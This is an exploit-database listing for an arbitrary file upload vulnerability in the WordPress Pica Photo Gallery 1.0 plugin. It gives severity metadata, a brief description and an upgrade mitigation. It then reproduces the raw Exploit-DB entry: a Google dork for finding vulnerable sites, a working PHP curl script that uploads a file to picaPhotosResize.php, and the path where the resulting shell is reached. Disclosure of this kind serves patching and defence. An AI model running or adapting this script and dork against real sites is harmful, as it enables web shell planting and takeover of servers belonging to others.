header-logo
Suggest Exploit
vendor:
Pica Photo Gallery
by:
Adrien Thierry
7,5
CVSS
HIGH
Arbitrary File Upload
434
CWE
Product Name: Pica Photo Gallery
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: YES
Related CWE: N/A
CPE: a:apptha:pica_photo_gallery
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Wordpress
2012

WordPress Pica Photo Gallery 1.0 Arbitrary File Upload

An arbitrary file upload vulnerability exists in the Pica Photo Gallery plugin version 1.0 for Wordpress. An attacker can exploit this vulnerability by sending a malicious file to the picaPhotosResize.php page via a POST request. This will allow the attacker to upload a malicious file to the server, which can then be accessed via the URL wp-content/uploads/pica-photo-gallery/info.php.

Mitigation:

Upgrade to the latest version of the Pica Photo Gallery plugin.
Source

Exploit-DB raw data:

###########################################################
#
# Exploit Title: Wordpress Pica Photo Gallery 1.0 Arbitrary File Upload
# Google Dork: inurl:wp-content/plugins/pica-photo-gallery/
# Date: 11/06/2012
# Exploit Author: Adrien Thierry
# Vendor Homepage:  http://www.apptha.com
# Software Link: http://downloads.wordpress.org/plugin/pica-photo-gallery.zip
# Version: 1.0
#
###########################################################

Vuln page : http://mysite.com/wp-content/plugins/pica-photo-gallery/picaPhotosResize.php

exploit :

<?php
$u="C:\Program Files (x86)\EasyPHP-5.3.9\www\info.php";
$c = curl_init("http://127.0.0.1/wordpress/wp-content/plugins/pica-photo-gallery/picaPhotosResize.php");
curl_setopt($c, CURLOPT_POST, true);
curl_setopt($c, CURLOPT_POSTFIELDS,
array('uploadfile'=>"@$u",
'albumId'=>"1",
'mode'=>"image"));
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
$e = curl_exec($c);
curl_close($c);
echo $e; 
?>

shell access : wp-content/uploads/pica-photo-gallery/info.php

#####################################################################

Navigation

Suggest Exploit

Services By CQR